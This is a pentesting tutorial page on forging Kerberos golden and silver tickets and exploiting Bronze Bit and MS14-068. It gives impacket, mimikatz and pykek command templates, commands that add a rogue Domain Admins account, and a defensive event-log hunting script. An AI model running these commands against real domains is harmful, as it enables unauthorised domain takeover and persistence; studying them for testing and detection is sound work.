Forged tickets
MITRE ATT&CK™ Sub-techniques T1558.001 and T1558.002

Theory

Silver and Golden tickets are forged Kerberos tickets that can be used with pass-the-ticket to access services in an Active Directory domain.
    Golden ticket: the NT hash (when the RC4 etype is not disabled, or any other Kerberos DES or AES key when it is) of the special krbtgt account can be used to forge a TGT (Ticket Granting Ticket) that can later be used with pass-the-ticket to access any resource within the AD domain. In practice, the krbtgt's key is used to encrypt and sign, among other things, the PAC (Privilege Attribute Certificate), a set of information about the requesting user (SID, group RIDs, etc.) that the KDC (Key Distribution Center) copies into the ST (Service Ticket) the user requests.
    Silver ticket: the NT hash (when the RC4 etype is not disabled, or any other Kerberos DES or AES key when it is) of a service account can be used to forge a Service Ticket that can later be used with pass-the-ticket to access that service only. In practice, the service key is used to encrypt, among other things, the PAC (Privilege Attribute Certificate), which the target service decrypts and reads to decide whether the user can have access, without contacting a domain controller.
The Bronze Bit vulnerability (CVE-2020-17049) makes it possible to obtain a forwardable service ticket in situations where the KDC would not normally issue one: when the impersonated user is protected (member of Protected Users, or marked as "sensitive and cannot be delegated"), or when the controlled service is configured for constrained delegation without protocol transition (Kerberos only). The resulting ticket can then be forwarded through S4U2proxy.

Practice

The following sections show how to obtain modified or crafted Kerberos tickets. Once obtained, these tickets can be used with Pass-the-Ticket.
For Golden and Silver tickets, it's important to remember that, by default, ticketer and mimikatz forge tickets containing PACs that say the user belongs to some well-known administrative groups (i.e. group RIDs 513, 512, 520, 518, 519: Domain Users, Domain Admins, Group Policy Creator Owners, Schema Admins and Enterprise Admins). There are scenarios where these groups are not enough (special machines where even Domain Admins don't have local admin rights).
In these situations, testers can either look for the domain groups that have local administrator privileges on the target machine, or specify all the group IDs when creating the ticket.
Nota bene: Deny ACEs could actually prevent the second solution from working. A Deny ACE preventing Domain Admins from logging on would apply to a ticket carrying all group IDs, since that includes the Domain Admins group ID.
When forging tickets, only the user ID and group IDs in the PAC are used for authorization; the user name supplied mostly matters for logging. On domain controllers patched against CVE-2021-42287 (November 2021 updates), however, the KDC checks that the requesting user's SID in the PAC belongs to an existing account, so the user name and user ID should correspond to a real account rather than a random one.

Golden ticket

In order to craft a golden ticket, testers need to find the krbtgt's NT hash or AES key (128 or 256 bits) as well as the domain SID. In most cases, the krbtgt key can only be obtained with domain admin privileges through a DCSync attack (or from an NTDS.dit copy). Because of this, golden tickets are a persistence and lateral-movement technique rather than a privilege escalation one.
Microsoft now uses AES 256-bit encryption by default. Forging the ticket with the krbtgt AES key (instead of the NT hash, i.e. an RC4 key) is stealthier: RC4 usage stands out in an environment where everything else is AES, and Kerberos events record the encryption type of the tickets they log.
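What the defender's side of the RC4-versus-AES point looks like in practice, as an added example that is not part of the original page: a small hunting script over domain controller Security events 4768 (TGT request) and 4769 (service ticket request). The events, account list and IP addresses below are constructed for the example; the rule names and thresholds are the author's own choices, not a product's.

```python
"""Hunt for forged-ticket indicators in Windows Security events 4768 and 4769.

Added example, not code from the original page: the events below are
constructed to look like the EventData fields of 4768 (TGT request) and
4769 (service ticket request) records exported from a domain controller.
"""
from collections import namedtuple

RC4_HMAC = "0x17"  # TicketEncryptionType value logged for rc4-hmac

Indicator = namedtuple("Indicator", "rule user ip service")

# Constructed sample events. Time is an increasing sequence number for ordering.
SAMPLE_EVENTS = [
    # normal logon: AS request followed by a TGS request for a file server
    {"EventID": 4768, "TargetUserName": "jdoe", "ServiceName": "krbtgt",
     "IpAddress": "10.0.0.15", "TicketEncryptionType": "0x12", "Time": 1},
    {"EventID": 4769, "TargetUserName": "jdoe@DOMAIN.LOCAL", "ServiceName": "FS01$",
     "IpAddress": "10.0.0.15", "TicketEncryptionType": "0x12", "Time": 2},
    # golden ticket forged with ticketer.py defaults (RC4 key, made-up user) and
    # used against the DC: the DC sees a TGS request it never issued a TGT for
    {"EventID": 4769, "TargetUserName": "randomuser@DOMAIN.LOCAL", "ServiceName": "DC01$",
     "IpAddress": "10.0.0.99", "TicketEncryptionType": "0x17", "Time": 3},
    # legitimate account but RC4 (legacy client or explicit etype request)
    {"EventID": 4768, "TargetUserName": "svc_backup", "ServiceName": "krbtgt",
     "IpAddress": "10.0.0.20", "TicketEncryptionType": "0x17", "Time": 4},
]
KNOWN_ACCOUNTS = {"jdoe", "svc_backup", "administrator", "krbtgt"}


def _user(name):
    """Normalise 'user@REALM' (4769) and 'user' (4768) to a lowercase account name."""
    return name.split("@", 1)[0].lower()


def find_indicators(events, known_accounts, aes_only=True):
    """Return Indicator tuples for events matching forged-ticket heuristics.

    rc4_etype       RC4 (0x17) in a domain that is supposed to be AES-only
    tgs_without_as  a 4769 with no earlier 4768 for the same user and source IP
                    on this DC (the TGT was not issued here: forged, or issued
                    by another DC, so correlate across all DCs before acting)
    unknown_account a 4769 for an account name that does not exist
    """
    known = {a.lower() for a in known_accounts}
    tgt_issued = set()
    hits = []
    for ev in sorted(events, key=lambda e: e["Time"]):
        user, ip, svc = _user(ev["TargetUserName"]), ev["IpAddress"], ev["ServiceName"]
        if aes_only and ev["TicketEncryptionType"] == RC4_HMAC:
            hits.append(Indicator("rc4_etype", user, ip, svc))
        if ev["EventID"] == 4768:
            tgt_issued.add((user, ip))
        elif ev["EventID"] == 4769:
            if (user, ip) not in tgt_issued:
                hits.append(Indicator("tgs_without_as", user, ip, svc))
            if user not in known:
                hits.append(Indicator("unknown_account", user, ip, svc))
    return hits


def rules_triggered(events=SAMPLE_EVENTS, known_accounts=KNOWN_ACCOUNTS):
    """Map each rule name to the set of (user, ip) pairs that triggered it."""
    summary = {}
    for hit in find_indicators(events, known_accounts):
        summary.setdefault(hit.rule, set()).add((hit.user, hit.ip))
    return summary


if __name__ == "__main__":
    for hit in find_indicators(SAMPLE_EVENTS, KNOWN_ACCOUNTS):
        print(f"{hit.rule:16} user={hit.user} src={hit.ip} service={hit.service}")
```

The RC4 rule is generic (it also fires on Kerberoasting and on legacy clients), so it is the correlation that matters: a golden ticket shows up on the DC as service ticket requests for which no DC ever issued a TGT. A silver ticket never reaches a DC at all, so none of these rules see it; that case has to be hunted on the target host (a Kerberos network logon with no matching 4769 on any DC).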
There are Impacket scripts for each step of a golden ticket creation: retrieving the krbtgt key (see DCSync), retrieving the domain SID (lookupsid), and creating the golden ticket (ticketer).
# Find the domain SID
lookupsid.py -hashes 'LMhash:NThash' 'DOMAIN/USER@TARGET' 0

# Create the golden ticket (with an RC4 key, i.e. NT hash)
ticketer.py -nthash $krbtgtNThash -domain-sid $domainSID -domain $DOMAIN randomuser

# Create the golden ticket (with an AES 128/256bits key)
ticketer.py -aesKey $krbtgtAESkey -domain-sid $domainSID -domain $DOMAIN randomuser

# Create the golden ticket (with an RC4 key, i.e. NT hash) with custom user/groups ids
ticketer.py -nthash $krbtgtNThash -domain-sid $domainSID -domain $DOMAIN -user-id $USERID -groups $GROUPID1,$GROUPID2,... randomuser
On Windows, mimikatz (C) can be used for this attack.
# with an NT hash
kerberos::golden /domain:$DOMAIN /sid:$DomainSID /rc4:$krbtgt_NThash /user:randomuser /ptt

# with an AES 128 key
kerberos::golden /domain:$DOMAIN /sid:$DomainSID /aes128:$krbtgt_aes128_key /user:randomuser /ptt

# with an AES 256 key
kerberos::golden /domain:$DOMAIN /sid:$DomainSID /aes256:$krbtgt_aes256_key /user:randomuser /ptt
For both mimikatz and Rubeus, the /ptt flag is used to automatically inject the ticket.

Silver ticket

In order to craft a silver ticket, testers need to find the target service account's NT hash or AES key (128 or 256 bits).
"While the scope is more limited than Golden Tickets, the required hash is easier to get and there is no communication with a DC when using them, so detection is more difficult than Golden Tickets." (adsecurity.org)
The Impacket script ticketer can create silver tickets.
# Find the domain SID
lookupsid.py -hashes 'LMhash:NThash' 'DOMAIN/USER@TARGET' 0

# with an NT hash
python ticketer.py -nthash $NThash -domain-sid $DomainSID -domain $DOMAIN -spn $SPN $Username

# with an AES (128 or 256 bits) key
python ticketer.py -aesKey $AESkey -domain-sid $DomainSID -domain $DOMAIN -spn $SPN $Username
The SPN (ServicePrincipalName) set will have an impact on what services will be reachable. For instance, cifs/target.domain or host/target.domain will allow most remote dumping operations (more info on adsecurity.org).
On Windows, mimikatz can be used to generate a silver ticket. Testers need to carefully choose the right SPN type (cifs, http, ldap, host, rpcss) depending on the wanted usage.
# with an NT hash (the target service account's, not the krbtgt's)
kerberos::golden /domain:$DOMAIN /sid:$DomainSID /rc4:$service_NThash /user:$username_to_impersonate /target:$targetFQDN /service:$spn_type /ptt

# with an AES 128 key
kerberos::golden /domain:$DOMAIN /sid:$DomainSID /aes128:$service_aes128_key /user:$username_to_impersonate /target:$targetFQDN /service:$spn_type /ptt

# with an AES 256 key
kerberos::golden /domain:$DOMAIN /sid:$DomainSID /aes256:$service_aes256_key /user:$username_to_impersonate /target:$targetFQDN /service:$spn_type /ptt
For both mimikatz and Rubeus, the /ptt flag is used to automatically inject the ticket.

Bronze bit (CVE-2020-17049)

In order to exploit this vulnerability, attackers need to find a service able to delegate to another service (see Kerberos delegations), and they need that first service account's Kerberos key (NT hash or AES key, 128 or 256 bits).
For example, with constrained delegation with protocol transition set between a controlled service and a target one, and the user to impersonate being protected, the Impacket script getST (Python) can perform all the necessary steps to obtain the final "impersonating" ST: S4U2self for the target user, decryption of the returned ticket with the controlled service key, setting of the forwardable flag, re-encryption, then S4U2proxy. In the commands below, "Administrator" is the impersonated/delegated account, but it can be any user in the environment.
The input credentials are those of the compromised service account configured with constrained delegation.
# with an NT hash
getST.py -force-forwardable -spn $Target_SPN -impersonate Administrator -dc-ip $Domain_controller -hashes :$Controlled_service_NThash $Domain/$Controlled_service_account

# with an AES (128 or 256 bits) key
getST.py -force-forwardable -spn $Target_SPN -impersonate Administrator -dc-ip $Domain_controller -aesKey $Controlled_service_AES_key $Domain/$Controlled_service_account
The SPN (ServicePrincipalName) set will have an impact on what services will be reachable. For instance, cifs/target.domain or host/target.domain will allow most remote dumping operations (more info on adsecurity.org).

MS14-068 (CVE-2014-6324)

This vulnerability allows attackers to forge a TGT with unlimited power (i.e. with a modified PAC stating the user is a member of privileged groups). This attack is similar to the golden ticket; however, it doesn't require the attacker to know the krbtgt key, because a vulnerable KDC accepts PAC signatures computed with unkeyed checksums. It is a really powerful privilege escalation technique, but it will not work on patched domain controllers.
pykek
This attack can be carried out with pykek's ms14-068 Python script. The script can run the attack with a cleartext password or with pass-the-hash.
Referring to kekeo's wiki might also help untangle some situations, but errors like KDC_ERR_SUMTYPE_NOSUPP (15) or KRB_ERR_GENERIC (60) when trying to use the generated .ccache ticket mean the target is patched.
In order to operate the attack, a domain account's name, its password (or NT hash) and its SID are needed. The SID can be obtained with the following script.
import ldap3

dc = "dc.domain.local"             # domain controller to query (hostname or IP, placeholder)
target_dn = "DC=domain,DC=local"   # search base: the domain naming context
domain = "domain.local"
username = "username"
password = "password"

user = "{}\\{}".format(domain, username)   # NTLM user format: DOMAIN\user
server = ldap3.Server(dc, get_info=ldap3.ALL)   # schema info lets ldap3 render objectSid as S-1-5-...
connection = ldap3.Connection(server=server, user=user, password=password, authentication=ldap3.NTLM)
if not connection.bind():
    raise SystemExit("bind failed: {}".format(connection.result))
connection.search(target_dn, "(samaccountname={})".format(username), attributes=["objectsid"])
print(connection.entries)
A TGT can then be obtained with one of the following commands.
# with a plaintext password
ms14-068.py -u 'USER'@'DOMAIN_FQDN' -p 'PASSWORD' -s 'USER_SID' -d 'DOMAIN_CONTROLLER'

# with pass-the-hash
ms14-068.py -u 'USER'@'DOMAIN_FQDN' --rc4 'NThash' -s 'USER_SID' -d 'DOMAIN_CONTROLLER'
Once the .ccache TGT is obtained, if the attack is successful, the ticket will be usable with pass-the-ticket. An easy way to check if the TGT works is to use it and ask for a service ticket. This can be done with Impacket's getST.py (Python).
getST.py -k -no-pass -spn 'any_valid_spn' $DOMAIN_FQDN/$USER
In some scenarios, I personally have had trouble using the .ccache ticket on UNIX-like systems. What I did was convert it to .kirbi, switch to a Windows system, inject the ticket with mimikatz's kerberos:ptt command, and then create a new user and add it to the domain admins group.
net user "hacker" "132Pentest!!!" /domain /add
net group "Domain Admins" "hacker" /domain /add
Metasploit Framework can also be useful, as it prints valuable error information.
msf6 > use admin/kerberos/ms14_068_kerberos_checksum

References

Silver & Golden Tickets (hackndo)
How Attackers Use Kerberos Silver Tickets to Exploit Systems (Active Directory Security)
Kerberos & KRBTGT: Active Directory's Domain Kerberos Service Account (Active Directory Security)
Kerberos in Active Directory (hackndo)
CVE-2020-17049: Kerberos Bronze Bit Attack - Overview (NetSPI)
Digging into MS14-068, Exploitation and Defence (F-Secure Labs)